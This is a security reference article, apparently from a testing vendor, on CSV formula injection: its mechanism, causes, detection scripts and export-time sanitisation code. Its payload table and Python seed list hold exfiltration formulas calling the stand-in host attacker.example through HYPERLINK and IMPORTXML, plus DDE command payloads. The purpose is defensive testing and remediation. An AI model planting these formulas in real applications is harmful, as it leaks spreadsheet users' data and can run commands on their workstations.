CSV Injection (Formula Injection)
detect, understand, remediate

CSV injection lets an attacker plant spreadsheet formulas inside data that the application later exports as a CSV, XLSX, or TSV file. When a user opens the export in Excel, LibreOffice Calc, or Google Sheets, the formula executes inside the spreadsheet, leading to data exfiltration, hyperlink phishing, and, on legacy DDE-enabled clients, command execution on the analyst workstation.

Severity	Medium
CWE ID	CWE-1236
OWASP Top 10	A03:2021 - Injection
CVSS 3.1 Score	6.5

What is CSV injection?

CSV injection, also called formula injection or Excel formula injection, is a vulnerability in which an attacker stores spreadsheet formulas inside fields that the application later exports as a CSV, XLSX, or TSV file. The exporting application is not where the payload executes; the payload fires when another user opens the export in a desktop or web spreadsheet client. Excel, LibreOffice Calc, and Google Sheets each treat a leading equals sign as the start of a formula, and the formula runs with the privileges of the analyst, finance reviewer, or auditor who opened the file.

CSV injection is tracked under CWE-1236 (improper neutralisation of formula elements in a CSV file). It is most commonly recorded as a medium-severity finding because the impact depends on downstream client behaviour that the application cannot fully control. The two main exploit classes are data exfiltration through HYPERLINK and IMPORTXML formulas and, on legacy Excel clients with Dynamic Data Exchange (DDE) enabled, command execution on the workstation. Modern Excel restricts DDE, and both Excel and Google Sheets warn before opening external links, but users who trust the source of the export routinely dismiss the prompts.

Like stored XSS, CSV injection is a stored attack. The malicious payload sits in the database until the export endpoint is hit, and the victim is whichever role downloads and opens the file. Pentest findings have to capture the full chain: the stored input, the export endpoint, the spreadsheet client that interprets the formula, and the action the formula performs once it executes.

How it works

Plant the formula

The attacker submits a value beginning with =, +, -, @, or a tab character into any field the application stores: a customer name, a support ticket title, a company description, a product SKU, an OAuth client name. No special UI access is required; any text field that ends up in an export is in scope.

Wait for an export

A staff user, finance reviewer, or compliance auditor downloads a CSV report that contains the stored value. The export endpoint serializes the field unchanged. Many platforms surface CSV exports under headings like Customer Activity, Audit Log, or Subscription Report.

Trigger on open

The reviewer opens the CSV in Excel, LibreOffice Calc, or Google Sheets. The leading equals sign (or another trigger character) is interpreted as the start of a formula, so the cell now holds an expression the client evaluates rather than inert data.

Execute the chain

The formula exfiltrates a cell value over HYPERLINK or IMPORTXML, opens a phishing URL on click, or, on a legacy Excel client with DDE enabled, launches a process. The action runs as the user who opened the file, not as the user who planted the payload.

Common formula payloads

Each row below is a payload pattern observed in real engagements. The first character is the trigger; the rest is the action. Authenticated scanners and manual testers should cover at least these classes before recording a finding as remediated.

Payload class	Example	Effect when opened
HYPERLINK exfiltration	=HYPERLINK("https://attacker.example/?d="&A1,"Click")	Renders a clickable link that leaks the value of cell A1 to the attacker on click. Phishing-style social engineering on top of formula execution.
External fetch (Sheets)	=IMPORTXML("https://attacker.example/","//x")	Google Sheets requests the attacker URL once the formula evaluates. The fetch is made by Google's servers rather than the user's browser, so it does not carry the user's cookies, but it confirms that the file was opened and leaks any cell values concatenated into the URL.
DDE command (legacy Excel)	=cmd|'/c calc'!A0	On Excel clients where Dynamic Data Exchange is still enabled, the cell launches a process. Modern Excel mitigates with prompts, but the mitigation is only as strong as the user's answer to the dialog.
Plus, minus, at sign	+SUM(1+1) / -2+5+cmd|'/c calc'!A0 / @SUM(1+1)*cmd...	Excel accepts +, -, and @ as formula triggers in addition to =. Sanitisation that only filters = leaves these vectors live.
Tab and CR prefix	\t=HYPERLINK(...)	A leading tab character is stripped on parse but the formula still executes. Filters that anchor on the first visible character miss this.
Hidden in concatenation	prefix=HYPERLINK(...)	A trigger that sits mid-value in one source field can still end up at the start of a cell when a downstream template builds cells by concatenating or splitting columns, for example when the preceding field is empty. Templated reports that build cells from multiple inputs can reintroduce a vulnerability that the export endpoint thought it had fixed.
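
As a rough illustration, the payload classes in the table can be kept as a seed list and classified by the trigger each one starts with. The names SEED_PAYLOADS and trigger_of are hypothetical, and attacker.example is the placeholder host used in the table; this is a sketch, not a complete payload corpus.

```python
from typing import Optional

# Hypothetical seed list: one marker payload per class from the table above.
SEED_PAYLOADS = {
    "hyperlink_exfiltration": '=HYPERLINK("https://attacker.example/?d="&A1,"Click")',
    "external_fetch": '=IMPORTXML("https://attacker.example/","//x")',
    "dde_command": "=cmd|'/c calc'!A0",
    "plus_trigger": "+SUM(1+1)",
    "minus_trigger": "-1+1",
    "at_trigger": "@SUM(1+1)",
    "tab_prefix": "\t=SUM(1+1)",
}

FORMULA_TRIGGERS = ("=", "+", "-", "@")


def trigger_of(value: str) -> Optional[str]:
    """Return the formula trigger a value starts with, ignoring leading tab/CR."""
    stripped = value.lstrip("\t\r")
    if stripped.startswith(FORMULA_TRIGGERS):
        return stripped[0]
    return None


for name, payload in SEED_PAYLOADS.items():
    print(f"{name}: trigger {trigger_of(payload)!r}")
```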

Common causes

Stored input echoed into exports unchanged

The export endpoint serializes whatever the database has stored, with no awareness that the destination format treats some cells as code. Customer name, ticket title, support reply, and support attachment caption are the typical sources.

Sanitisation only at the input layer

Validation rejects a formula at form submission but the same field accepts the same value when written through the API, the bulk import endpoint, or a CSV ingestion path. The export endpoint reads the raw column and assumes earlier code already cleaned it.

Filtering only the equals sign

A filter strips a leading = but allows +, -, @, and tab. Excel treats +, -, and @ as formula triggers too, and a leading tab is discarded before the formula is parsed, so the partial filter ships the same finding under a slightly different payload.
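
The gap can be sketched in a few lines. The function strip_leading_equals below is a hypothetical stand-in for such a partial filter, and still_dangerous is an illustrative check that ignores a leading tab or carriage return before looking for a trigger.

```python
def strip_leading_equals(value: str) -> str:
    """Hypothetical partial filter: removes one leading '=' and nothing else."""
    return value[1:] if value.startswith("=") else value


def still_dangerous(value: str) -> bool:
    """True if the value starts with a formula trigger once leading tab/CR are ignored."""
    return value.lstrip("\t\r").startswith(("=", "+", "-", "@"))


samples = ["=SUM(1+1)", "+SUM(1+1)", "-1+1", "@SUM(1+1)", "\t=SUM(1+1)"]
for sample in samples:
    filtered = strip_leading_equals(sample)
    print(repr(sample), "->", repr(filtered), "still dangerous:", still_dangerous(filtered))
```

Only the first sample is neutralised; the other four pass through the filter unchanged.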

Quoting CSV fields without escaping the trigger

Wrapping the cell in double quotes does not neutralise a formula. Excel still interprets =HYPERLINK(...) as a formula even when the cell is quoted in the source CSV. The fix has to neutralise the trigger character, not just escape the field.
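
One way to see this is to serialise a payload with full quoting and read it back. The sketch below uses Python's standard csv module; the reader stands in for a spreadsheet client's CSV parser, which is an assumption, and attacker.example is a placeholder host.

```python
import csv
import io

# Write one row with every field wrapped in double quotes.
buffer = io.StringIO()
writer = csv.writer(buffer, quoting=csv.QUOTE_ALL)
writer.writerow(["Acme Ltd", '=HYPERLINK("https://attacker.example/","Click")'])
line = buffer.getvalue()
print(line)

# Parse the row back the way a CSV consumer would: the quotes are removed
# and the cell value still begins with the '=' trigger.
parsed = next(csv.reader(io.StringIO(line)))
print(parsed[1].startswith("="))
```

Quoting protects the field boundaries (commas, quotes, newlines inside the value), which is a different problem from the formula trigger.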

Multi-format exports built from one template

A reporting pipeline that emits CSV, XLSX, and PDF from one template often gets PDF and XLSX right (because those go through a layout layer) while emitting CSV directly from the database. The least-protected format becomes the path of least resistance.

Trusting the destination application

Teams assume Excel and Google Sheets will warn the user. They do, but the warning is dismissed in routine workflows where the file is expected. Defensive engineering has to assume the warning will be clicked through.

How to detect it

Automated detection

SecPortal's authenticated scanner walks discovered export endpoints, plants formula payloads in fields that flow into CSV, XLSX, and TSV downloads, and inspects the rendered output for the trigger character.
Findings carry the seed payload, the export endpoint, the affected column, and the rendered cell so the chain is reproducible against the same asset weeks later during retest.
The findings database deduplicates against earlier CSV injection findings on the same column so a partial fix is not recorded as a new vulnerability.

Manual testing

Map every text input that the application persists. Customer name, ticket title, internal note, support reply, address line, OAuth client name, webhook description, and SAML attribute are all routinely re-emitted in CSV exports.
Plant marker formulas (=HYPERLINK, =IMPORTXML, =SUM(1+1), +SUM(1+1), -1+1, @SUM(1+1), and a tab-prefixed variant) and trigger every export the application offers: CSV, XLSX, TSV, and any analytics download.
Open each export in Excel, LibreOffice Calc, and Google Sheets. Note which clients fire the formula, which prompt, and which silently render the value. Treat the prompt as part of the impact statement, not as a clean bill of health.
Test fields that are concatenated into export cells from multiple columns. A fix on one source field can leave a sibling field unprotected, and the concatenated cell still produces a leading trigger character.
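
Before opening each export by hand, a small script can flag candidate cells. The following is a minimal sketch using only the standard library; find_formula_cells and the sample export text are hypothetical, and a hit only means the cell starts with a trigger character, not that a given client will evaluate it.

```python
import csv
import io
from typing import Iterator, Tuple

TRIGGERS = ("=", "+", "-", "@")


def find_formula_cells(csv_text: str) -> Iterator[Tuple[int, int, str]]:
    """Yield (row, column, value) for cells that start with a formula trigger.

    Leading tab and carriage return are ignored before the check, so a
    tab-prefixed payload is still reported.
    """
    reader = csv.reader(io.StringIO(csv_text, newline=""))
    for row_index, row in enumerate(reader):
        for col_index, cell in enumerate(row):
            if cell.lstrip("\t\r").startswith(TRIGGERS):
                yield row_index, col_index, cell


# Hypothetical export body with a header row and three data rows.
export = (
    "name,ticket\r\n"
    'Acme,"=HYPERLINK(""https://attacker.example/"",""x"")"\r\n'
    "Bob,-1+1\r\n"
    "Carol,hello\r\n"
)
hits = list(find_formula_cells(export))
for row, col, value in hits:
    print(f"row {row}, column {col}: {value!r}")
```

Legitimate values such as negative numbers also match, so the output is a list of cells to open in a real client, not a list of confirmed findings.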

How to fix it

Neutralise trigger characters at export time

Prefix any cell that begins with =, +, -, @, tab, or carriage return with a single quote, or pad the value with a leading and a trailing tab. The single-quote prefix is the simplest and most portable: Excel, LibreOffice, and Google Sheets all treat the resulting cell as text. Apply the rule at the export serializer, not at the input layer, because input-layer fixes rarely cover every write path.
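
A minimal sketch of the single-quote rule applied inside the serializer, using Python's standard csv module. The names neutralise_cell and export_csv are hypothetical, and the sketch assumes every cell is exported as text.

```python
import csv
import io
from typing import Iterable, Sequence

# Characters that must not appear at the start of an exported cell.
TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value: object) -> str:
    """Return the cell as text, prefixed with a single quote if it starts with a trigger."""
    text = "" if value is None else str(value)
    if text.startswith(TRIGGER_CHARS):
        return "'" + text
    return text


def export_csv(rows: Iterable[Sequence[object]]) -> str:
    """Serialise rows to CSV, neutralising every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buffer.getvalue()


print(export_csv([["Acme Ltd", "=SUM(1+1)"], ["Bob", "\t=SUM(1+1)"]]))
```

Because the rule runs in the serializer, it covers values that arrived through the API or a bulk import as well as the form. Note that this sketch also prefixes negative numbers such as -5; an export with genuinely numeric columns may want to handle those columns separately.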

Treat XLSX as a separate code path from CSV

Generating XLSX through a library that writes cell types explicitly (text vs formula) avoids the ambiguity entirely. A library that auto-detects the cell type from the value will still treat a leading = as a formula, so the same neutralisation has to apply on the way into the workbook.

Filter every trigger character, not just =

A filter that only blocks = leaves +, -, @, tab, and carriage return live. Cover the full set: ASCII 0x3D, 0x2B, 0x2D, 0x40, 0x09, 0x0D. Reject or escape on any of them at the start of a cell or at the start of a concatenation result.
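
The code points listed above can be checked directly, including on the result of a concatenation rather than on each source field. This is an illustrative sketch; starts_with_trigger and build_cell are hypothetical names, and the single-quote escape is one of the two options, chosen here for brevity.

```python
from typing import Iterable

# '=', '+', '-', '@', tab, carriage return
TRIGGER_CODE_POINTS = frozenset({0x3D, 0x2B, 0x2D, 0x40, 0x09, 0x0D})


def starts_with_trigger(text: str) -> bool:
    """True if the first character of text is one of the trigger code points."""
    return bool(text) and ord(text[0]) in TRIGGER_CODE_POINTS


def build_cell(parts: Iterable[str]) -> str:
    """Concatenate source fields, then escape based on the joined result."""
    joined = "".join(parts)
    return "'" + joined if starts_with_trigger(joined) else joined


# An empty first field lets the second field's '=' reach the start of the cell.
print(repr(build_cell(["", "=SUM(1+1)"])))
# A non-empty first field keeps the '=' away from the start of the cell.
print(repr(build_cell(["Acme ", "=SUM(1+1)"])))
```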

Block control characters at submission time

Reject input that contains tab and carriage return characters in fields that are not supposed to carry whitespace formatting. Many CSV injection payloads rely on a tab prefix that survives display rendering but still triggers the formula on export.
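
A submission-time check along these lines might look like the sketch below. ControlCharacterError and validate_single_line_field are hypothetical names, and the check is meant as a complement to export-time neutralisation, not a replacement for it.

```python
FORBIDDEN_CONTROL_CHARS = ("\t", "\r")


class ControlCharacterError(ValueError):
    """Raised when a single-line field contains a tab or carriage return."""


def validate_single_line_field(field_name: str, value: str) -> str:
    """Return value unchanged, or raise if it contains a forbidden control character."""
    for char in FORBIDDEN_CONTROL_CHARS:
        if char in value:
            raise ControlCharacterError(
                f"{field_name} contains forbidden control character {char!r}"
            )
    return value


print(validate_single_line_field("company_name", "Acme Ltd"))
try:
    validate_single_line_field("company_name", "\t=SUM(1+1)")
except ControlCharacterError as error:
    print("rejected:", error)
```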

Document the export contract

Treat every CSV, XLSX, and TSV export as a separate output contract that the security team reviews. A new export endpoint added to the dashboard must pass the same neutralisation rules as the original export, even when the underlying data has not changed.

Educate the recipient on the warning prompt

Internal staff who routinely open exports should be trained to take the spreadsheet client's formula prompts seriously. Process documentation that says "click yes to enable links" is the same documentation that disarms the last mitigation the spreadsheet client provides.

Where CSV injection shows up in real engagements

CSV injection is most often recorded against fields the application owners did not consider sensitive. The chains below describe how stored content moves into an export endpoint and ends up firing a formula in a downstream desktop client. Recognising these chains during triage matters more than any single payload, because the vulnerability lives in the data flow, not in the input form.

Support ticket export to finance

A customer plants =HYPERLINK in their company name during signup. The support team exports a CSV of all tickets each month for finance reconciliation. Finance opens the export in Excel and clicks the link; the click fires a request from inside the corporate network and exposes to the attacker whatever cell values the formula appended to the URL.

OAuth client name in audit log

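An attacker registers an OAuth application with a name that begins with =IMPORTXML pointing at an attacker-controlled URL. An auditor downloads the OAuth registration log as a CSV; opening it in Google Sheets evaluates the IMPORTXML formula, and the resulting request carries whatever cell values the formula concatenated into the URL. The request is made from Google's servers, so the auditor's cookies are not attached; what leaks is the exported data itself.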

CRM contact export

A field rep imports leads via CSV. The import accepts a contact whose company description contains a DDE payload. A different rep exports the contact list weeks later for a quarterly review and opens it in legacy Excel; the DDE fires before the user sees the cell content.

Subscription invoice export

A self-service customer sets their billing address to include a leading +. The billing system exports a CSV monthly; finance opens it in Excel; Excel parses the cell as a formula starting with +. A formula injection that began as a billing artefact lands as a stored client-side execution finding on the report.

Reporting and triage in the engagement

CSV injection is easy to dismiss as low-impact because the proof of concept is a spreadsheet cell with a formula in it. Credible reports walk the chain: which input field accepted the payload, which export endpoint serialized it, which spreadsheet clients fire the formula, and what the formula reaches once it executes. SecPortal's findings management stores the full evidence chain on the finding, so the link from stored input to client-side execution stays attached during retest rather than being reconstructed from the operator's notes.

Severity calibration matters. A formula that only renders as text in modern Excel and Google Sheets is informational; a HYPERLINK exfiltration that succeeds against the application's expected reviewer audience is medium; a DDE command that lands on a sales workstation under a default Excel install is high. The severity calibration research covers how to score this kind of chain finding without double-counting downstream client behaviour the application cannot enforce.

Retests have to walk every export endpoint, not just the field that produced the original finding. A new dashboard CSV added between the original test and the retest can reintroduce the vulnerability against a column the original test never planted into. The remediation tracking workflow keeps the export inventory attached to the retest so verification covers the full surface, and AI report generation turns the chain into a writeup the client's engineering team can act on without rebuilding the proof of concept.

Compliance impact